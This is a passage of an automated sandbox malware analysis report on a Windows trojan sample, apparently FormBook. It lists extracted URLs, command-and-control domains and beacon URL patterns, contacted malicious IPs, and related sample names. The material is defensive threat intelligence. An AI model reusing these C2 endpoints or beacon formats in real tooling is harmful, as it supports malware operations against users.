            http://www.sainikshiksha.com/mc10/www.fondsa.xyzexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.ajansyapai.net/mc10/www.tatesfluffyfrenchies.comexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000004.00000000.1703761960.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.zaki-argan.comReferer:explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.tatesfluffyfrenchies.com/mc10/explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            		unknown
            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://schemas.micrexplorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.thecollisionmagazine.com/mc10/explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.carterandcone.coml8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.dealerxai.comexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.fontbureau.com/designers/frere-user.html8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.shophansler.com/mc10/:explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            		unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.motolimod.com/mc10/explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.sainikshiksha.comReferer:explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://android.notify.windows.com/iOSexplorer.exe, 00000004.00000002.4153126684.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1707756779.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.tatesfluffyfrenchies.com/mc10/www.dealerxai.comexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            		unknown
            http://www.thecollisionmagazine.comReferer:explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000004.00000000.1703761960.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.basedawgz.liveReferer:explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://outlook.com_explorer.exe, 00000004.00000002.4153126684.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1707756779.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.fontbureau.com/designersG8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://schemas.miexplorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.fontbureau.com/designers/?8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.founder.com.cn/cn/bThe8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.zaki-argan.com/mc10/explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.huttonsidel.onlineReferer:explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.fontbureau.com/designers?8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000004.00000002.4143507586.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.at89v2.comexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://powerpoint.office.comcemberexplorer.exe, 00000004.00000002.4153126684.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1707756779.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.motolimod.comReferer:explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.kurainu.xyzReferer:explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.bjcysadz.xyzReferer:explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.llngx.comReferer:explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.tiro.com8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.291van.fun/mc10/www.motolimod.comexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.sakkal.comne8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703686104.0000000005690000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.goodfont.co.kr8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.kurainu.xyz/mc10/explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://schemas.microexplorer.exe, 00000004.00000000.1706494215.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1704923328.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1704462653.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.typography.netD8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.llngx.comexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.galapagosdesign.com/staff/dennis.htm8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.bjcysadz.xyz/mc10/www.zaki-argan.comexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://api.msn.com/qexplorer.exe, 00000004.00000003.3114554074.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.291van.funReferer:explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.kurainu.xyz/mc10/www.291van.funexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.tatesfluffyfrenchies.comReferer:explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.fonts.com8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            103.224.212.213
            		www.at89v2.comAustralia
            		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
            188.114.97.3
            		www.291van.funEuropean Union
            		13335CLOUDFLARENETUStrue
            3.64.163.50
            		unknownUnited States
            		16509AMAZON-02UStrue

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1470721
            Start date and time:2024-07-10 12:08:08 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 12m 6s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:13
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Sample name:8tvMmyxveyzFcnJ.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@285/1@14/3
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 97%
            • Number of executed functions: 118
            • Number of non-executed functions: 327
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240000 for current running targets taking high CPU consumption

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtEnumerateKey calls found.
            • Report size getting too big, too many NtOpenKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            06:09:00API Interceptor1x Sleep call for process: 8tvMmyxveyzFcnJ.exe modified
            06:09:09API Interceptor8917497x Sleep call for process: explorer.exe modified
            06:09:45API Interceptor8330821x Sleep call for process: netsh.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            103.224.212.213tYEY1UeurGz0Mjb.exeGet hashmaliciousFormBookBrowse
            • www.serco2020.com/dy13/?IR=7H41Cx9M/9Klm4wO2KyYkeGFvajkB7bQdwjfmZPzOjV6ZXjzQq6V6P6jcCKZla+kGSS1&nL=S4247TXPfxsLR
            yPURXYpFVuXra2o.exeGet hashmaliciousFormBookBrowse
            • www.bolinkpass.club/cr12/?XDHHT=vl9/KZA8hSVZlZYYRwiRPHDwK+fMeRW7mLcdcO2HrZ8WCY+A9QkbN6YtC02r8Olco4RS&MZt0=njKl2H4htFXPs
            Ajanlatkeres_2024.05.29.PDF.exeGet hashmaliciousFormBook, LokibotBrowse
            • www.vivaness.club/dn03/?KvOx3=rTguiTyPWe+LQ3wbOsvLrlRt5HkRD6mO+8zHcQ1TTPZ93ZKF8Svri6qQbYlnCi86X6wl&LhEx=ODKXZDVpY2w8gpmp
            Solicitud de pedido Documento No 168646080.exeGet hashmaliciousFormBook, PureLog StealerBrowse
            • www.yassa-hany.online/pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpBqNAn8DKeRhHzw==&CR=_DHhAtX
            DHL Factura Electronica Pendiente documento No 04BB25083.exeGet hashmaliciousFormBook, PureLog StealerBrowse
            • www.yassa-hany.online/pz08/?N6Ahw=3ffl2F0Punah42&Ap=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuP1PGrx4qdiR
            PaDQmSw2ud.dllGet hashmaliciousLaplas ClipperBrowse
            • searchseedphase.online/bot/regex
            PaDQmSw2ud.dllGet hashmaliciousLaplas ClipperBrowse
            • searchseedphase.online/bot/regex
            Documento de confirmacion de orden de compra OC 1580070060.exeGet hashmaliciousFormBookBrowse
            • www.yassa-hany.online/pz08/?mzrPV4R=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVpBqNDhq+c&Rl=8pFP0r98Chvt5p5P
            2024-09C33T37.exeGet hashmaliciousFormBookBrowse
            • www.jeffwertdesign.com/ve92/?K2M8bVC=FFlo4/TKNXAR7V12oAudCGusg/tK2zFE/4uuQQ9Wgy0sGP4AKi+QV1PLyZgh2gAJGU7I&tXC=BDK02VJ87dHtUzo
            rBCPcomprobante.exeGet hashmaliciousFormBookBrowse
            • www.yassa-hany.online/pz08/?CrFT7j=ftx8Clc09Ned3F&pR-l7PfH=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVQNLhAw6fb
            188.114.97.3Packing List,BL & Final Invoice.xlsGet hashmaliciousLokibotBrowse
            • sini.la/c40mh
            HSOwUsZ7hs6Pm4m.exeGet hashmaliciousFormBookBrowse
            • www.artfulfusionhub.lat/qogc/
            j2vPH4wfF2YxEja.exeGet hashmaliciousFormBookBrowse
            • www.artfulfusionhub.lat/qogc/
            DY3AojqquRfcmp5.exeGet hashmaliciousFormBookBrowse
            • www.9muyiutyt.online/39t8/
            SecuriteInfo.com.Exploit.CVE-2017-11882.123.8256.26893.rtfGet hashmaliciousFormBookBrowse
            • www.exporationgenius.sbs/x06k/
            PO2767.xlsGet hashmaliciousFormBookBrowse
            • sini.la/53zqx
            vV389MGvCt9jWzm.exeGet hashmaliciousLokibotBrowse
            • gitak.top/evie2/five/fre.php
            offertfrfrgan.xlsGet hashmaliciousUnknownBrowse
            • sini.la/9m28x
            Inquiry PR#27957.bat.exeGet hashmaliciousFormBookBrowse
            • www.globaltrend.xyz/srh8/?lv-=IQYINTaWkaojOw8AeeCEPfEIeYkq+BJ0MxZ2KDKAvD89Td2DcEp1Lez+9d6wDeiGuMtHeyxXV+kcq5RzRjH8Tl/MEdpNR0v4ePERtHY07mFLqmHNNg==&GJtTF=-FH8yJw
            http://threemanshop.comGet hashmaliciousUnknownBrowse
            • threemanshop.com/cdn-cgi/images/cf-icon-server.png

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            www.291van.fun327vRde1h3nsEEG.exeGet hashmaliciousFormBookBrowse
            • 188.114.96.3
            disjR92Xrrnc3aZ.exeGet hashmaliciousFormBookBrowse
            • 188.114.97.3
            ext-sq.squarespace.com5.exeGet hashmaliciousFormBookBrowse
            • 198.185.159.144
            327vRde1h3nsEEG.exeGet hashmaliciousFormBookBrowse
            • 198.185.159.144
            Scan405.exeGet hashmaliciousFormBookBrowse
            • 198.185.159.144
            ScanPDF_102.exeGet hashmaliciousFormBookBrowse
            • 198.185.159.144
            tYEY1UeurGz0Mjb.exeGet hashmaliciousFormBookBrowse
            • 198.185.159.144
            Orden de compra 0307AR24.exeGet hashmaliciousFormBookBrowse
            • 198.185.159.144
            Att00173994.exeGet hashmaliciousFormBookBrowse
            • 198.185.159.144
            disjR92Xrrnc3aZ.exeGet hashmaliciousFormBookBrowse
            • 198.185.159.144
            2024 Lusail Fence-WITH STICKER-2-003.exeGet hashmaliciousFormBookBrowse
            • 198.185.159.144
            INVOICE - MV CNC BANGKOK - ST24PJ-278.exeGet hashmaliciousFormBookBrowse
            • 198.185.159.144

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            CLOUDFLARENETUShttps://github.com/blackcoffe74/blackcoffe74/releases/tag/latGet hashmaliciousLummaC, BiFrost, LummaC StealerBrowse
            • 188.114.96.3
            MV ALEXOS_VESSEL'S DESC.docx.scr.exeGet hashmaliciousAgentTeslaBrowse
            • 172.67.74.152
            http://my.vrca.ca/_alcd/etr.ashx?etuid=B6EC5EC3-A3FA-4276-9728-F0F26D555086&p=https://microsoft.com@invstrategy.com/DocuSign.htmlGet hashmaliciousUnknownBrowse
            • 188.114.96.3
            https://m.exactag.com/ai.aspx?tc=d9282403bc40b07205bbd26a23a8d2e6b6b4f9&url=//onlygod.pages.dev/#Y2Fyb2xpbmUudmlhbm5hQGdsb2JhbGZvdW5kcmllcy5jb20=Get hashmaliciousUnknownBrowse
            • 104.17.25.14
            ScowanElectronic RECEIPT #11782.htmlGet hashmaliciousUnknownBrowse
            • 104.17.25.14
            https://in.xero.com/otg9csffpxao6afkqb3xwrugoatdbpeduijycctcGet hashmaliciousUnknownBrowse
            • 162.247.243.29
            SecuriteInfo.com.Trojan.PackedNET.2944.29161.19818.exeGet hashmaliciousSnake KeyloggerBrowse
            • 188.114.97.3
            https://forms.promo-pharmacies.gr/6659c886cdd608959f27a71aGet hashmaliciousUnknownBrowse
            • 188.114.96.3
            https://materialesvite.com.mx/upload/QebqNQebqN/QebqN/YWxiZXJ0by5kb3Npb0B0aGFsZXNhbGVuaWFzcGFjZS5jb20=Get hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
            • 104.18.11.207
            http://protingent.comGet hashmaliciousUnknownBrowse
            • 1.1.1.1
            TRELLIAN-AS-APTrellianPtyLimitedAUArrival Notice_AWB 4560943391.vbeGet hashmaliciousFormBook, GuLoaderBrowse
            • 103.224.212.216
            NGL 700800.exeGet hashmaliciousFormBookBrowse
            • 103.224.182.250
            http://sectocarewl.online/mona-michelle/Get hashmaliciousUnknownBrowse
            • 103.224.212.210
            tYEY1UeurGz0Mjb.exeGet hashmaliciousFormBookBrowse
            • 103.224.212.213
            SOA 020724.exeGet hashmaliciousFormBookBrowse
            • 103.224.182.250
            Inquiry No PJO-4010574.exeGet hashmaliciousFormBookBrowse
            • 103.224.182.250
            http://pollyfill.ioGet hashmaliciousUnknownBrowse
            • 103.224.182.252
            rPRESUPUESTO.exeGet hashmaliciousFormBookBrowse
            • 103.224.182.246
            INVOICE - MV CNC BANGKOK - ST24PJ-278.exeGet hashmaliciousFormBookBrowse
            • 103.224.182.210
